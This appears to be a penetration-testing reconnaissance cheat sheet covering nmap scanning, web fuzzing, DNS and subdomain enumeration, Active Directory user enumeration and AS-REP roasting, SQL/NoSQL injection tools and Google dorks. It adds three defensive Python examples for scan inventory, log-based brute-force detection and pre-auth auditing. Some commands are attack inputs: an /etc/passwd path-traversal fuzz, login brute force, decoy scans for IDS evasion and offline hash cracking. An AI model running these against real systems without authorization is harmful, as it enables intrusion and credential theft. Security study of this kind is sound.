Reconnaissance (recon) can be defined as a preliminary investigation or observation of your target (the client) without alerting it to your activities. If your reconnaissance activities are too noisy, the other party will be alerted, which could reduce your chances of success.
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.” – Sun Tzu
Tips
Add the domain to /etc/hosts if needed
Network scan
Host discovery
😎 Quick Access
Host discovery scan (ping sweep; ARP requests on the local segment, no port scan) :
nmap -sn <CIDR>
SMB host :
crackmapexec smb <IP-range>
Windows servers :
nmap -T3 -p53,88,389,445,636 <IP-range> --open
# Windows NetBIOS name to IP :
ping <hostname>
nslookup <hostname>
Netdiscover
Passive scan (ARP sniff) :
sudo netdiscover -i <interface> -r <IP> -p
Active scan :
sudo netdiscover -i <interface> -r <IP>
👺 Impacts network performance
Nmap
Host discovery scan (ping sweep; ARP requests on the local segment, no port scan) :
nmap -sn <CIDR>
Fast scan (Top 1K ports) :
sudo nmap -sS -sU -sV -sC -oA ./quick <IP>   # -oA takes a basename and writes quick.nmap, quick.gnmap and quick.xml
Full scan (Run again with all ports) :
sudo nmap -p- -sS -sU -sV -sC -oA ./full <IP>
Aggressive fast scan :
nmap -A <IP>
Aggressive host scan (All enabled – if needed) :
nmap -p0- -v -A -T4 -oA ./aggressive <IP>
Vulnerability scan :
nmap -sV -sC --script=vuln -oA ./vuln <IP>
Scan from spoofed IPs (Firewall/IDS evasion) :
nmap -D <IP-1>,...,<IP-n> <IP>
| Option | Description |
|---|---|
| -sC | Scan with default NSE scripts. Considered useful for discovery and safe |
| -sS | TCP SYN port scan (default with root privilege) |
| -sT | TCP connect port scan (default without root privilege) |
| -sU | UDP port scan |
| -sA | TCP ACK port scan |
| -sW | TCP Window port scan |
| -sV | Attempts to determine the version of the service running on the port |
| -A | Aggressive mode. Enables OS detection, version detection, script scanning, and traceroute |
| -O | OS fingerprinting |
| -T0 | Paranoid (0): Intrusion Detection System evasion |
| -T1 | Sneaky (1): Intrusion Detection System evasion |
| -T2 | Polite (2): slows down the scan to use less bandwidth and fewer target machine resources |
| -T3 | Normal (3): the default speed |
| -T4 | Aggressive (4): speeds up the scan; assumes you are on a reasonably fast and reliable network |
| -T5 | Insane (5): speeds up the scan; assumes you are on an extraordinarily fast network |
| -oA | Output in the three major formats at once |
| -D | (Decoy) Send scans from spoofed IPs |
| --script=safe | Won't affect the target |
| --script=vuln | Scan for vulnerabilities |
| --script=exploit | Attempt to exploit a vulnerability |
| --script=auth | Attempt to bypass authentication for running services (e.g. log into an FTP server anonymously) |
| --script=brute | Attempt to bruteforce credentials for running services |
| --script=discovery | Attempt to query running services for further information about the network (e.g. query an SNMP server) |
| -oG <file> | Grepable output format |
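The `-oA` runs above leave a `<basename>.xml` file next to the text output; that XML is the form worth keeping, because it can be turned into a host/port inventory and diffed against what is supposed to be exposed. The following is an added example, not code from the original cheat sheet: it parses a constructed nmap-shaped XML sample (not a real scan) with the standard library and flags open ports that are absent from a hypothetical approved-exposure list.

```python
"""Parse nmap XML output (-oX, or the .xml file written by -oA <basename>) into
a host/port inventory and flag ports not on an approved-exposure list.

Added example, not part of the original cheat sheet. SAMPLE_NMAP_XML is a
constructed sample shaped like nmap's real output, not a captured scan; the
APPROVED table is a hypothetical policy for the example."""
import xml.etree.ElementTree as ET

# Constructed sample: two hosts up (one with an unexpected SMB/SNMP exposure), one down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oA quick 10.0.0.0/30">
  <host>
    <status state="up"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.3" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Hypothetical approved exposure per host (assumption for the example).
APPROVED = {
    "10.0.0.1": {("tcp", 22), ("tcp", 80)},
    "10.0.0.2": set(),
}


def parse_nmap_xml(xml_text):
    """Return {ip: [(proto, port, state, service_name), ...]} for hosts that are up."""
    root = ET.fromstring(xml_text)
    inventory = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        entries = []
        for port in host.findall("ports/port"):
            state_el = port.find("state")
            state = state_el.get("state") if state_el is not None else "unknown"
            svc = port.find("service")
            name = svc.get("name") if svc is not None else ""
            entries.append((port.get("protocol"), int(port.get("portid")), state, name))
        inventory[addr.get("addr")] = entries
    return inventory


def open_ports(inventory):
    """Only ports nmap reports as open (UDP often shows as open|filtered)."""
    return {
        ip: sorted((proto, port) for proto, port, state, _ in entries if state.startswith("open"))
        for ip, entries in inventory.items()
    }


def unexpected_exposure(inventory, approved):
    """(ip, proto, port) triples that are open but not on the approved list for that host."""
    findings = []
    for ip, ports in open_ports(inventory).items():
        for proto, port in ports:
            if (proto, port) not in approved.get(ip, set()):
                findings.append((ip, proto, port))
    return findings


if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip, ports in open_ports(inv).items():
        print(ip, ports)
    for ip, proto, port in unexpected_exposure(inv, APPROVED):
        print(f"UNEXPECTED: {ip} {proto}/{port}")
```

Replace `SAMPLE_NMAP_XML` with `open("quick.xml").read()` to run it over a real `-oA` result; the comparison against an approved list is what turns a scan into a finding rather than a port dump.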
Nmap Automator
nmapAutomator.sh -H <IP> -t recon
Scan automation modes :
- Network : Shows all live hosts in the host’s network (~15 seconds)
- Port : Shows all open ports (~15 seconds)
- Script : Runs a script scan on found ports (~5 minutes)
- Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
- UDP : Runs a UDP scan “requires sudo” (~5 minutes)
- Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
- Recon : Suggests recon commands, then prompts to automatically run them
- All : Runs all the scans (~20-30 minutes)
Windows
IPv4 host discovery (IPv4NetworkScan.ps1) :
powershell -ep bypass
L:\oscp\IPv4NetworkScan.ps1 -StartIPv4Address <IP-start> -EndIPv4Address <IP-end>
Linux
Host discovery (ARP) :
sudo arp-scan <CIDR>   # needs raw socket access, hence sudo
Web
Directory Listing
FFUF
ffuf -recursion -u http://lun.fr/FUZZ -w <wordlist>
ffuf -u http://lun.fr/page.php?FUZZ=../../../../../../../../etc/passwd -w <wordlist>
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
# /usr/share/wordlists/dirb/common.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# look for response 200 & 302
# FUZZ.pdf
# FUZZ.txt
# FUZZ.php
# FUZZ.aspx
#/usr/share/wordlists/Security-Wordlist/LFI-WordList-Linux (from github)
#/usr/share/wordlists/Security-Wordlist/LFI-WordList-Windows
Auth cracking (password brute force against a login form) :
ffuf -u http://lun.fr/login -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -w <wordlist>
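Directory fuzzing and the form brute force above are both loud in the web server's access log: one client producing a burst of 404s, or a run of failed POSTs to the login path. The following added example, not code from the original page, scores a constructed combined-format access log per client IP on exactly those two signals. The log lines, the 404 and failed-login thresholds, and the assumption that a failed login returns 401/403 are all constructed for the example.

```python
"""Spot directory fuzzing (ffuf/dirbuster style) and login brute forcing in a
web server access log from per-client response-code patterns.

Added example, not from the original page. build_sample_log() constructs the
lines in Apache/nginx combined-log shape; thresholds and the 401/403 failed-
login convention are assumptions to tune per site."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def build_sample_log():
    """Constructed: a fuzzer (25 x 404), a login brute forcer (8 x 401), a normal user."""
    lines = [f'203.0.113.9 - - [10/Oct/2023:13:55:{i:02d} +0000] "GET /fuzz{i} HTTP/1.1" 404 196'
             for i in range(25)]
    lines.append('203.0.113.9 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php HTTP/1.1" 200 1024')
    lines += [f'198.51.100.4 - - [10/Oct/2023:14:00:{i:02d} +0000] "POST /login HTTP/1.1" 401 52'
              for i in range(8)]
    lines += ['192.0.2.10 - - [10/Oct/2023:14:05:00 +0000] "GET / HTTP/1.1" 200 2048',
              '192.0.2.10 - - [10/Oct/2023:14:05:01 +0000] "GET /missing.css HTTP/1.1" 404 196']
    return lines


SAMPLE_LOG = build_sample_log()


def parse_line(line):
    """Dict of ip/ts/method/path/status/size, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # compare paths without the query string
    return rec


def analyse_access_log(lines, enum_threshold=20, login_threshold=5, login_path="/login"):
    """Return {ip: {"not_found": n, "login_failures": n}} for clients over either threshold."""
    counts = defaultdict(lambda: {"not_found": 0, "login_failures": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        c = counts[rec["ip"]]
        if rec["status"] == 404:
            c["not_found"] += 1
        if rec["method"] == "POST" and rec["path"] == login_path and rec["status"] in (401, 403):
            c["login_failures"] += 1
    return {ip: c for ip, c in counts.items()
            if c["not_found"] >= enum_threshold or c["login_failures"] >= login_threshold}


if __name__ == "__main__":
    for ip, c in analyse_access_log(SAMPLE_LOG).items():
        print(ip, c)
```

On the defending side the same counters are what a rate limit or a WAF rule keys on; on the testing side they are a reminder that the "look for response 200 & 302" filter hides the volume of 404s the target still logged.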
dirbuster
Domains / Subdomains
Search engines
# google search
site:*.domain.com -site:www.domain.com
Bruteforce
ffuf -u http://lun.fr -H "Host: FUZZ.lun.fr" -w <wordlist>
#/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
# look for response 200 & 302
DNS
whois <domain> # hosting / registrar information
host -a <domain>
host -l <domain> [dns-server]
############################################
dnsrecon -d <domain> -t axfr [dns-server] # (active)
dnsenum <domain>
dig @<dns-server> <domain>
nslookup <domain>
sublist3r -d <domain> # aggregates multiple sources
Reverse IP Lookup
Active Directory
Enumerate AD Users
Bruteforce with Kerbrute
Valid usernames :
sudo ./kerbrute userenum --dc <DC-IP> -d <domain> <usernames.txt>
AS-REP Roasting (AS-REP Roastable users)
Get a KRB_AS_REP :
impacket-GetNPUsers -dc-ip <DC-IP> -request -outputfile hashes.asreproast <domain>/<username>
Crack password :
sudo hashcat -m 18200 hashes.asreproast <wordlist> -r /usr/share/hashcat/rules/best64.rule --force
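AS-REP roasting only works against accounts whose userAccountControl carries the UF_DONT_REQUIRE_PREAUTH bit (0x400000), so the defender-side check is simply to list those accounts from a directory export and re-enable pre-authentication. The following added example, not code from the original page, decodes the documented userAccountControl bits from a constructed CSV export (sAMAccountName, userAccountControl) and reports the enabled accounts that are exposed; the export contents are constructed for the example.

```python
"""List accounts whose Kerberos pre-authentication is disabled (the
UF_DONT_REQUIRE_PREAUTH bit in userAccountControl), i.e. the accounts an
AS-REP roasting attempt would find, so they can be fixed first.

Added example, not from the original page. SAMPLE_EXPORT is a constructed
CSV; a real one would be exported from AD/LDAP with the same two columns.
The bit values are the documented userAccountControl flags."""
import csv
import io

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQUIRE_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQUIRE_PREAUTH = 0x400000

# Constructed export: 4260352 = 0x410200 (normal + no-expiry + no-preauth),
# 66048 = 0x10200, 4260354 = 0x410202 (same as the first, but disabled), 512 = normal.
SAMPLE_EXPORT = """sAMAccountName,userAccountControl
svc_backup,4260352
jdoe,66048
old_admin,4260354
asmith,512
"""


def parse_export(text):
    """[(sAMAccountName, userAccountControl as int), ...] from the CSV text."""
    reader = csv.DictReader(io.StringIO(text))
    return [(row["sAMAccountName"], int(row["userAccountControl"])) for row in reader]


def decode_uac(uac):
    """Names of the known flags set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if uac & bit}


def preauth_disabled_accounts(records, include_disabled=False):
    """Account names with pre-auth disabled; disabled accounts are skipped unless asked for."""
    found = []
    for name, uac in records:
        if not uac & DONT_REQUIRE_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(name)
    return found


if __name__ == "__main__":
    records = parse_export(SAMPLE_EXPORT)
    for name in preauth_disabled_accounts(records):
        print(f"{name}: {sorted(decode_uac(dict(records)[name]))}")
```

The fix is to clear the "Do not require Kerberos preauthentication" option on each reported account (and give any that genuinely need it a long random password, since the AS-REP hash is offline-crackable exactly as the hashcat line above shows); on the monitoring side, a 4768 event with Pre-Authentication Type 0 is the request such an account answers.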
App Vulnerability
nikto -h <url>
wpscan --url <url> # wordpress
cmsmap.py <url> # WordPress, Joomla, Drupal and Moodle
whatweb <url> # list the web technologies in use
## Injection
# SQL
sqlmap -u "http://example.com/?id=1" -p id # GET Requests
sqlmap -u "http://example.com" --data "username=*&password=*" # POST Requests
# NoSQL
python3 nosql-login-bypass.py -t http://dev.stocker.htb/login -u username -p password #https://github.com/C4l1b4n/NoSQL-Attack-Suite
nmap -p <port> <IP> --script=<script-name>
#/usr/share/nmap/scripts
searchsploit <technology>
Wordlists
SecLists
https://github.com/danielmiessler/SecLists
Rockyou
Frameworks Enumeration
sudo sniper -t <domain>
sudo sniper -t <domain> -m stealth -o -re
# passive + OSINT
sudo amass enum -d <domain> -src -ip
Social / OSINT
Hint
- Google Search / Google Image
- Profile pages (LinkedIn, Twitter, Facebook, Instagram)
- Job offers
- Git repositories
- Forums
Dorks
# filter by website
site:<domain>
# cache search (old version)
cache:<url> <keyword>
cache:https://example.com hello
# search within the html body
intext:"<keyword>"
intext:"password"
intext:"@<domain>"
# search within the html body (every listed word must appear)
allintext:<keyword> <keyword>
allintext:username password
# file type filter
filetype:log
# programming language / file extension filter
ext:php OR ext:xml OR ext:py
# exclusion
-<expression>
See more : Exploit-DB (Google Hacking Database), DorkSearch
Tools
Maltego
Reconnaissance tool built on a graph of entities and transformations: domain name –> IP –> reverse DNS –> other domain names
Shodan
shodan myip
shodan host <host>
Recon-NG
recon-ng
> help
> workspaces create <WORKSPACE_NAME>
> db schema # show the database tables
> db insert domains # add a domain to analyse
> marketplace search <module>
> marketplace info <module>
> marketplace install <module>
> marketplace remove <module>
> modules search <module>
> modules load <module>
> options list
> options set SOURCE example.com
> run
recon-ng -w <WORKSPACE_NAME> # start a predefined workspace